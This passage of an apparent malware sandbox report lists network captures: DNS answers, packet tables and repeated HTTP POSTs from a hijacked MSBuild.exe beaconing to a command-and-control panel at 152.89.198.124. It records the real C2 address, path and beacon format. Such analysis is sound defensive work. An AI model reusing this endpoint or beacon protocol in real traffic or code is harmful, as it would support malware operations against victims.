Oct 27, 2024 17:12:06.593772888 CET	58002	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:12:06.593841076 CET	58003	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:12:06.594054937 CET	58003	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:12:06.599710941 CET	80	58003	152.89.198.124	192.168.2.4
Oct 27, 2024 17:12:07.455554962 CET	80	58003	152.89.198.124	192.168.2.4
Oct 27, 2024 17:12:07.456993103 CET	58003	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:12:08.962342024 CET	58003	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:12:08.962877989 CET	58004	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:12:08.968251944 CET	80	58003	152.89.198.124	192.168.2.4
Oct 27, 2024 17:12:08.968317986 CET	80	58004	152.89.198.124	192.168.2.4
Oct 27, 2024 17:12:08.968348026 CET	58003	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:12:08.968403101 CET	58004	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:12:08.968569994 CET	58004	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:12:08.973975897 CET	80	58004	152.89.198.124	192.168.2.4
Oct 27, 2024 17:12:09.870383978 CET	80	58004	152.89.198.124	192.168.2.4
Oct 27, 2024 17:12:09.870563984 CET	58004	80	192.168.2.4	152.89.198.124

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 27, 2024 17:10:48.795819998 CET	53	49299	162.159.36.2	192.168.2.4
Oct 27, 2024 17:10:49.443651915 CET	53	49886	1.1.1.1	192.168.2.4

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 27, 2024 17:10:24.215651989 CET	1.1.1.1	192.168.2.4	0x4a96	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 27, 2024 17:10:24.215651989 CET	1.1.1.1	192.168.2.4	0x4a96	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Oct 27, 2024 17:10:59.915761948 CET	1.1.1.1	192.168.2.4	0x8b44	No error (0)	shed.dual-low.s-part-0023.t-0009.t-msedge.net	s-part-0023.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 27, 2024 17:10:59.915761948 CET	1.1.1.1	192.168.2.4	0x8b44	No error (0)	s-part-0023.t-0009.t-msedge.net		13.107.246.51	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

152.89.198.124

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	57713	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:11:00.752402067 CET	160	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 27, 2024 17:11:01.637686014 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:11:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	57723	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:11:03.170928955 CET	312	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Oct 27, 2024 17:11:04.068958044 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:11:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	57736	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:11:05.781279087 CET	160	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 27, 2024 17:11:06.681996107 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:11:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	57751	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:11:08.200527906 CET	312	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Oct 27, 2024 17:11:09.075877905 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:11:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	57767	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:11:10.764023066 CET	160	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 27, 2024 17:11:11.640331030 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:11:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	57783	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:11:13.156743050 CET	312	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Oct 27, 2024 17:11:14.043231964 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:11:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	57795	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:11:15.686041117 CET	160	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 27, 2024 17:11:16.563880920 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:11:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	57808	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:11:18.075803041 CET	312	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Oct 27, 2024 17:11:18.955905914 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:11:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	57824	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:11:20.591247082 CET	160	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 27, 2024 17:11:21.495649099 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:11:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	57835	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:11:23.015571117 CET	312	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Oct 27, 2024 17:11:23.888232946 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:11:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	57846	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:11:25.516392946 CET	160	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 27, 2024 17:11:26.641118050 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:11:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Oct 27, 2024 17:11:26.641850948 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:11:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	57862	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:11:28.153795004 CET	312	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Oct 27, 2024 17:11:29.299602032 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:11:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Oct 27, 2024 17:11:29.300141096 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:11:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	57878	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:11:30.935889959 CET	160	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 27, 2024 17:11:31.930165052 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:11:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	57893	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:11:33.451251030 CET	312	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Oct 27, 2024 17:11:34.330238104 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:11:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	57909	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:11:35.966837883 CET	160	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 27, 2024 17:11:36.862191916 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:11:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	57920	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:11:38.375391006 CET	312	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Oct 27, 2024 17:11:39.302932978 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:11:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	57936	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:11:40.934854031 CET	160	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 27, 2024 17:11:41.815068007 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:11:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	57947	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:11:43.399909019 CET	312	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Oct 27, 2024 17:11:44.290601969 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:11:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	57963	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:11:46.126533031 CET	160	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 27, 2024 17:11:47.035291910 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:11:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	57979	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:11:48.781318903 CET	312	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Oct 27, 2024 17:11:49.677695036 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:11:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	57994	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:11:51.466300964 CET	160	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
